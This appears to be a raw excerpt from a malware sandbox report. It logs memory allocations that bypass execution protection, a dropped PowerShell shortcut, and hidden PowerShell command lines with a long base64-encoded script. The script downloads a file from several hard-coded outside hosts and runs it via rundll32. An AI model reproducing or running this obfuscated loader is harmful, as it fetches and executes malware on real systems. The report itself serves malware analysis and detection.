protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02229000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ada000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02adb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02adc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02add000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ade000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02adf000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ae0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ae1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ae2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ae3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABiAG8AbABlAHcAbwByAHQAIAA9ACAAIgBhAHIAYQB3AGEAawAiADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQA0ADsAJAB1AG4AaABvAG0AbwBsAG8AZwBpAHoAZQBkAEQAaQBzAHQAcgBhAGMAdABpAG4AZwAgAD0AIAAiAGgAbwBsAGwAeQBoAG8AYwBrACIAOwAkAGIAdQBtAGIAbABlAGIAZQByAHIAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQAYwBBAEwAZwBBAHgAQQBEAE0AQQBOAHcAQQB1AEEARABFAEEATQBRAEEAMQBBAEMANABBAE0AZwBBADEAQQBEAFUAQQB3AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUQBBAEgASQBBAFoAUQBCADIAQQBHAGsAQQBjAHcAQgBwAEEARwBJAEEAYgBBAEIANQBBAEUAOABBAFkAdwBCAGoAQQBHAGsAQQBaAEEAQgBsAEEARwA0AEEAZABBAEIAaABBAEcAdwBBAGMAdwBBAHUAQQBHAGMAQQBZAFEAQgB0AEEARwBVAEEAYwB3AEEAPQB3AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgASQBBAFoAUQBCAGoAQQBHAGsAQQBjAHcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEMANABBAGMAQQBCAGgAQQBIAEkAQQBkAEEAQgB1AEEARwBVAEEAYwBnAEIAegBBAEEAPQA9AHcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBRAEEAWgBRAEIAMwBBAEcATQBBAGQAUQBCAHcAQQBGAEEAQQBiAHcAQgB6AEEASABRAEEAWgBRAEIAdQBBAEcATQBBAFoAUQBCAHcAQQBHAGcAQQBZAFEAQgBzAEEARwA4AEEAYgBnAEEAdQBBAEcAUQBBAGIAdwBCAG4AQQBBAD0APQAiADsAJABtAHkAZQBsAG8AbgBpAGMAIAA9ACAAIgBtAGEAegBlAGQAbAB5AEcAbAB5AGMAbwBnAGUAbgBvAGwAeQBzAGkAcwAiADsAJABTAHEAdQBpAGwAbABpAGQAYQBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATwBBAEEAdgBBAEcAWQBBAGEAZwBCAE8AQQBFAGsAQQBWAEEAQgB3AEEARwBNAEEATAB3AEIAVgBBAEgAWQBBAE4AZwBBAHkAQQBFAEUAQQBPAFEAQgB0AEEAQQA9AD0AVwBmAHgAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAFEAQQB1AEEARABFAEEATgB3AEEAeQBBAEMANABBAE4AQQBBADEAQQBDADQAQQBPAFEAQQB2AEEARQB3AEEAWgBRAEIAeABBAEMAOABBAFQAUQBCAEkAQQBGAEEAQQBWAFEAQgBCAEEARQBVAEEAZAB3AEEAdwBBAEcARQBBAFcAUQBCAFEAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABpAG4AYwBvAG0AbQBvAGQAaQBvAHUAcwAgAGkAbgAgACQAUwBxAHUAaQBsAGwAaQBkAGEAZQAgAC0AcwBwAGwAaQB0ACAAIgBXAGYAeABmACIAKQAgAHsAJAByAGEAdgBpAHMAaABtAGUAbgB0AHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAE0AQQBiAHcAQgB5AEEASABrAEEAYwBBAEIAbwBBAEcARQBBAFoAUQBCAHUAQQBHAGsAQQBaAEEAQgBRAEEARwBnAEEAWgBRAEIAdQBBAEcAOABBAGUAQQBCAHAAQQBHAFEAQQBMAGcAQgB1AEEARwBjAEEAYgB3AEEAPQB5AHIAPQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAEkAQQBhAFEAQgB2AEEASABBAEEAYQBBAEIANQBBAEgAUQBBAFoAUQBCAFEAQQBIAEkAQQBaAFEAQgB3AEEARwBFAEEAYwBnAEIAaABBAEgAUQBBAGEAUQBCADIAQQBHAFUAQQBMAGcAQgAwAEEARwA4AEEAZQBRAEIAegBBAEEAPQA9ACIAOwB0AHIAeQAgAHsAJAB0AGUAbABlAGMAYQBtAGUAcgBhACAAPQAgADMAMAA0ADsAJABpAG4AYwBsAGEAcwBwAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAaQBuAGMAbwBtAG0AbwBkAGkAbwB1AHMAKQApADsAaQB3AHIAIAAkAGkAbgBjAGwAYQBzAHAAcwAgAC0ATwAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGYAbwB1AGwAaQBzAGgAUgBpAHYAZQByAGwAZQBzAHMALgBBAGcAbwBuAGkAYQBQAGgAbwBuAG8AbQBpAG0AaQBjADsAJABjAGEAZQBzAGEAcgBpAHMAdABzACAAPQAgACIAUwBhAHIAbwBuAGkAYwBJAG4AdgBhAGcAaQBuAGEAdABpAG4AZwAiADsAJABUAHcAaQBzAHQAZQBuAGUAZABIAGUAbQBpAGUAcABpAGwAZQBwAHMAeQAgAD0AIAAiAHIAZQBjAGEAcAB0AGkAdgBhAHQAaQBvAG4AUwBpAG0AcABsAHkAIgA7ACQAdABpAHQAbABlAG4AZQBHAHUAbgBkAGkAZQAgAD0AIAAiAE4AbwBuAGIAYQBzAGUAbQBlAG4AdABXAGkAcwBlAGgAZQBhAHIAdABlAGQAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABmAG8AdQBsAGkAcwBoAFIAaQB2AGUAcgBsAGUAcwBzAC4AQQBnAG8AbgBpAGEAUABoAG8AbgBvAG0AaQBtAGkAYwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMgA3ADAAOAAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBaAGcAQgB2AEEASABVAEEAYgBBAEIAcABBAEgATQBBAGEAQQBCAFMAQQBHAGsAQQBkAGcAQgBsAEEASABJAEEAYgBBAEIAbABBAEgATQBBAGMAdwBBAHUAQQBFAEUAQQBaAHcAQgB2AEEARwA0AEEAYQBRAEIAaABBAEYAQQBBAGEAQQBCAHYAQQBHADQAQQBiAHcAQgB0AEEARwBrAEEAYgBRAEIAcABBAEcATQBBAEwAQQBCAHcAQQBIAEkAQQBhAFEAQgB1AEEASABRAEEATwB3AEIATwBBAEcAVQBBAGUAQQBCADAAQQBFAG8AQQBVAHcAQQA9ACIAOwAkAE4AdQBuAG4AaQBzAGgAIAA9ACAAIgBJAGcAbgBlAG8AYQBxAHUAZQBvAHUAcwBVAG4AcgBvAGIAZQBkACIAOwAkAFEAdQBlAHMAdABpAG8AbgBhAGIAbABlACAAPQAgACIARwBvAG8AcwBlAGIAZQByAHIAeQBOAG8AbgBjAG8AZQByAGMAaQBvAG4AIgA7AGIAcgBlAGEAawA7AE4AZQB4AHQASgBTADsAfQBOAGUAeAB0AEoAUwA7AH0AIABjAGEAdABjAGgAIAB7ACQAdgBlAHIAbgBpAHgAZQBzAFMAbgBhAHAAZAByAGEAZwBvAG4AcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE8AUQBBAHUAQQBEAEkAQQBNAEEAQQAyAEEAQwA0AEEATgBBAEEAMQBBAEMANABBAE0AUQBBADAAQQBEAEkAQQB4AE8ATQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEQAQQBHADgAQQBiAEEAQgBzAEEARwBVAEEAZABBAEIAcABBAEcANABBAFoAdwBCAFcAQQBHAFUAQQBjAGcAQgB1AEEARwBFAEEAWQB3AEIAMQBBAEcAdwBBAFkAUQBCAHkAQQBHAGsAQQBjAHcAQgAwAEEAQwA0AEEAWQB3AEIAeQBBAEcAawBBAFkAdwBCAHIAQQBHAFUAQQBkAEEAQQA9AHgATwBNAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUwBBAEcARQBBAGQAZwBCAGwAQQBHAHcAQQBhAFEAQgB1AEEARwBjAEEAYwB3AEIAUABBAEgAVQBBAGQAQQBCAHoAQQBHAEUAQQBkAEEAQQB1AEEARwAwAEEAWgBRAEEAPQAiADsAJABDAG8AbgBjAGUAcwBzAGkAbwBuAGEAaQByAGUAcwBHAGwAdQBtAHAAaQBuAGUAcwBzACAAPQAgACIAQgB1AHAAbABlAHUAcgB1AG0AQwBhAHQAZQBnAG8AcgBpAHMAZQAiADsAJABhAHMAYwBhAGIAYQByAHQARgBhAGMAaQBsAGkAdABhAHQAaQB2AGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBOAHcAQQB1AEEARABVAEEATgBBAEEAdQBBAEQAawBBAE0AZwBBAHUAQQBEAFUAQQBOAFEAQQA9AGsAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBrAEEAYgBRAEIAdwBBAEgASQBBAFoAUQBCAHoAQQBIAE0AQQBZAFEAQgB5AEEARwBrAEEATABnAEIAbwBBAEcAOABBAGIAQQBCAGsAQQBHAGsAQQBiAGcAQgBuAEEASABNAEEAawBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHUAQQBHADgAQQBiAGcAQgB6AEEARwBVAEEAYwBnAEIAcABBAEcAOABBAGQAUQBCAHoAQQBHAHcAQQBlAFEAQQB1AEEARwBFAEEAWQB3AEIAagBBAEcAOABBAGQAUQBCAHUAQQBIAFEAQQBZAFEAQgB1AEEASABRAEEAYwB3AEEAPQBrAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAMQBBAEcANABBAGMAUQBCADEAQQBHAFUAQQBjAGcAQgBwAEEARwBVAEEAWgBBAEEAdQBBAEcAWQBBAGMAZwBBAD0AIgA7AH0AfQAkAEUAeABzAGUAYwBhAG4AdABzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABJAEEAWQBRAEIAMABBAEgAUQBBAGIAQQBCAGwAQQBHAEkAQQBkAFEAQgB6AEEARwBnAEEAUQBnAEIAcABBAEcAYwBBAGEAQQBCADAAQQBHAFUAQQBaAEEAQQB1AEEARwAwAEEAWQBRAEIAeQBBAEcAcwBBAFoAUQBCADAAQQBBAD0APQAiADsAJABzAHEAdQBpAGIAcwB0AGUAcgBIAGUAeABhAG0AZQB0AGgAeQBsAGUAbgBlAHQAZQB0AHIAYQBtAGkAbgBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBRAEEAYwBnAEIAaABBAEcATQBBAGEAQQBCAGwAQQBHAGsAQQBaAEEAQgBsAEEARQA4AEEAWgBnAEIAbQBBAEcAVQBBAGIAZwBCAHoAQQBHAGsAQQBkAGcAQgBsAEEASABNAEEATABnAEIAdABBAEcAOABBAGIAUQBBAD0AbABpAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgB3AEEAeQBBAEMANABBAE0AZwBBAHkAQQBEAEUAQQBMAGcAQQB5AEEARABRAEEATgBBAEEAdQBBAEQASQBBAE0AQQBBADEAQQBBAD0APQBsAGkAQQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAGcAQQBOAHcAQQB1AEEARABFAEEATQBnAEEAeQBBAEMANABBAE0AUQBBADQAQQBEAEkAQQBMAGcAQQAzAEEARABNAEEAIgA7ACQAdAByAG8AcABoAG8AZABlAHIAbQBCAGUAbgB6AGkAbAAgAD0AIAAyADEANwA7AA=="
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABiAG8AbABlAHcAbwByAHQAIAA9ACAAIgBhAHIAYQB3AGEAawAiADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQA0ADsAJAB1AG4AaABvAG0AbwBsAG8AZwBpAHoAZQBkAEQAaQBzAHQAcgBhAGMAdABpAG4AZwAgAD0AIAAiAGgAbwBsAGwAeQBoAG8AYwBrACIAOwAkAGIAdQBtAGIAbABlAGIAZQByAHIAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQAYwBBAEwAZwBBAHgAQQBEAE0AQQBOAHcAQQB1AEEARABFAEEATQBRAEEAMQBBAEMANABBAE0AZwBBADEAQQBEAFUAQQB3AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUQBBAEgASQBBAFoAUQBCADIAQQBHAGsAQQBjAHcAQgBwAEEARwBJAEEAYgBBAEIANQBBAEUAOABBAFkAdwBCAGoAQQBHAGsAQQBaAEEAQgBsAEEARwA0AEEAZABBAEIAaABBAEcAdwBBAGMAdwBBAHUAQQBHAGMAQQBZAFEAQgB0AEEARwBVAEEAYwB3AEEAPQB3AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgASQBBAFoAUQBCAGoAQQBHAGsAQQBjAHcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEMANABBAGMAQQBCAGgAQQBIAEkAQQBkAEEAQgB1AEEARwBVAEEAYwBnAEIAegBBAEEAPQA9AHcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBRAEEAWgBRAEIAMwBBAEcATQBBAGQAUQBCAHcAQQBGAEEAQQBiAHcAQgB6AEEASABRAEEAWgBRAEIAdQBBAEcATQBBAFoAUQBCAHcAQQBHAGcAQQBZAFEAQgBzAEEARwA4AEEAYgBnAEEAdQBBAEcAUQBBAGIAdwBCAG4AQQBBAD0APQAiADsAJABtAHkAZQBsAG8AbgBpAGMAIAA9ACAAIgBtAGEAegBlAGQAbAB5AEcAbAB5AGMAbwBnAGUAbgBvAGwAeQBzAGkAcwAiADsAJABTAHEAdQBpAGwAbABpAGQAYQBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATwBBAEEAdgBBAEcAWQBBAGEAZwBCAE8AQQBFAGsAQQBWAEEAQgB3AEEARwBNAEEATAB3AEIAVgBBAEgAWQBBAE4AZwBBAHkAQQBFAEUAQQBPAFEAQgB0AEEAQQA9AD0AVwBmAHgAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAFEAQQB1AEEARABFAEEATgB3AEEAeQBBAEMANABBAE4AQQBBADEAQQBDADQAQQBPAFEAQQB2AEEARQB3AEEAWgBRAEIAeABBAEMAOABBAFQAUQBCAEkAQQBGAEEAQQBWAFEAQgBCAEEARQBVAEEAZAB3AEEAdwBBAEcARQBBAFcAUQBCAFEAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABpAG4AYwBvAG0AbQBvAGQAaQBvAHUAcwAgAGkAbgAgACQAUwBxAHUAaQBsAGwAaQBkAGEAZQAgAC0AcwBwAGwAaQB0ACAAIgBXAGYAeABmACIAKQAgAHsAJAByAGEAdgBpAHMAaABtAGUAbgB0AHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAE0AQQBiAHcAQgB5AEEASABrAEEAYwBBAEIAbwBBAEcARQBBAFoAUQBCAHUAQQBHAGsAQQBaAEEAQgBRAEEARwBnAEEAWgBRAEIAdQBBAEcAOABBAGUAQQBCAHAAQQBHAFEAQQBMAGcAQgB1AEEARwBjAEEAYgB3AEEAPQB5AHIAPQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAEkAQQBhAFEAQgB2AEEASABBAEEAYQBBAEIANQBBAEgAUQBBAFoAUQBCAFEAQQBIAEkAQQBaAFEAQgB3AEEARwBFAEEAYwBnAEIAaABBAEgAUQBBAGEAUQBCADIAQQBHAFUAQQBMAGcAQgAwAEEARwA4AEEAZQBRAEIAegBBAEEAPQA9ACIAOwB0AHIAeQAgAHsAJAB0AGUAbABlAGMAYQBtAGUAcgBhACAAPQAgADMAMAA0ADsAJABpAG4AYwBsAGEAcwBwAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAaQBuAGMAbwBtAG0AbwBkAGkAbwB1AHMAKQApADsAaQB3AHIAIAAkAGkAbgBjAGwAYQBzAHAAcwAgAC0ATwAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGYAbwB1AGwAaQBzAGgAUgBpAHYAZQByAGwAZQBzAHMALgBBAGcAbwBuAGkAYQBQAGgAbwBuAG8AbQBpAG0AaQBjADsAJABjAGEAZQBzAGEAcgBpAHMAdABzACAAPQAgACIAUwBhAHIAbwBuAGkAYwBJAG4AdgBhAGcAaQBuAGEAdABpAG4AZwAiADsAJABUAHcAaQBzAHQAZQBuAGUAZABIAGUAbQBpAGUAcABpAGwAZQBwAHMAeQAgAD0AIAAiAHIAZQBjAGEAcAB0AGkAdgBhAHQAaQBvAG4AUwBpAG0AcABsAHkAIgA7ACQAdABpAHQAbABlAG4AZQBHAHUAbgBkAGkAZQAgAD0AIAAiAE4AbwBuAGIAYQBzAGUAbQBlAG4AdABXAGkAcwBlAGgAZQBhAHIAdABlAGQAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABmAG8AdQBsAGkAcwBoAFIAaQB2AGUAcgBsAGUAcwBzAC4AQQBnAG8AbgBpAGEAUABoAG8AbgBvAG0AaQBtAGkAYwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMgA3ADAAOAAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBaAGcAQgB2AEEASABVAEEAYgBBAEIAcABBAEgATQBBAGEAQQBCAFMAQQBHAGsAQQBkAGcAQgBsAEEASABJAEEAYgBBAEIAbABBAEgATQBBAGMAdwBBAHUAQQBFAEUAQQBaAHcAQgB2AEEARwA0AEEAYQBRAEIAaABBAEYAQQBBAGEAQQBCAHYAQQBHADQAQQBiAHcAQgB0AEEARwBrAEEAYgBRAEIAcABBAEcATQBBAEwAQQBCAHcAQQBIAEkAQQBhAFEAQgB1AEEASABRAEEATwB3AEIATwBBAEcAVQBBAGUAQQBCADAAQQBFAG8AQQBVAHcAQQA9ACIAOwAkAE4AdQBuAG4AaQBzAGgAIAA9ACAAIgBJAGcAbgBlAG8AYQBxAHUAZQBvAHUAcwBVAG4AcgBvAGIAZQBkACIAOwAkAFEAdQBlAHMAdABpAG8AbgBhAGIAbABlACAAPQAgACIARwBvAG8AcwBlAGIAZQByAHIAeQBOAG8AbgBjAG8AZQByAGMAaQBvAG4AIgA7AGIAcgBlAGEAawA7AE4AZQB4AHQASgBTADsAfQBOAGUAeAB0AEoAUwA7AH0AIABjAGEAdABjAGgAIAB7ACQAdgBlAHIAbgBpAHgAZQBzAFMAbgBhAHAAZAByAGEAZwBvAG4AcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE8AUQBBAHUAQQBEAEkAQQBNAEEAQQAyAEEAQwA0AEEATgBBAEEAMQBBAEMANABBAE0AUQBBADAAQQBEAEkAQQB4AE8ATQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEQAQQBHADgAQQBiAEEAQgBzAEEARwBVAEEAZABBAEIAcABBAEcANABBAFoAdwBCAFcAQQBHAFUAQQBjAGcAQgB1AEEARwBFAEEAWQB3AEIAMQBBAEcAdwBBAFkAUQBCAHkAQQBHAGsAQQBjAHcAQgAwAEEAQwA0AEEAWQB3AEIAeQBBAEcAawBBAFkAdwBCAHIAQQBHAFUAQQBkAEEAQQA9AHgATwBNAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUwBBAEcARQBBAGQAZwBCAGwAQQBHAHcAQQBhAFEAQgB1AEEARwBjAEEAYwB3AEIAUABBAEgAVQBBAGQAQQBCAHoAQQBHAEUAQQBkAEEAQQB1AEEARwAwAEEAWgBRAEEAPQAiADsAJABDAG8AbgBjAGUAcwBzAGkAbwBuAGEAaQByAGUAcwBHAGwAdQBtAHAAaQBuAGUAcwBzACAAPQAgACIAQgB1AHAAbABlAHUAcgB1AG0AQwBhAHQAZQBnAG8AcgBpAHMAZQAiADsAJABhAHMAYwBhAGIAYQByAHQARgBhAGMAaQBsAGkAdABhAHQAaQB2AGUAIAA9ACAAIgBhAEEAQ